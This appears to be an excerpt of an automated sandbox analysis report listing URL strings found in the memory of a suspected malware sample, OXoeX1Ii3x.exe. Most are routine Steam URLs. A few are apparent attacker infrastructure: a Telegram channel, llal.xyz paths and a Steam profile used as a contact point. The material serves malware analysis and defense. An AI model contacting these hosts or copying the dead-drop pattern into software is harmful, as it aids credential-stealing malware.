Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=engl
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=en
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=en
Source: OXoeX1Ii3x.exe, 00000000.00000002.2505872324.000000000313A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://community.fastly4
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://help.steampowered.com/en/
Source: OXoeX1Ii3x.exeString found in binary or memory: https://https://t.me/asdfghjrrewqqqqtfg/ujs/WorldHellostrwvfncexGostrbrCHbrGkunknownftpac/Up/gltype
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506187344.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d3
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506187344.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842dL
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506187344.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842db
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506187344.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyz/ujs/2ae977f4-db12-4876-9e4d-fc8d1778842dy
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506187344.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://llal.xyzuser
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/discussions/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199619938930
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/market/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: OXoeX1Ii3x.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930/badges
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930/inventory/
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930AC
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506187344.00000000033EE000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2038063020.00000000033EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930HS
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930O
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930QC
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930V
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930yB
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199619938930~
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;eE
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/about/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/explore/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/legal/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/mobile
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/news/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/poin
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/points/shop/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/stats/
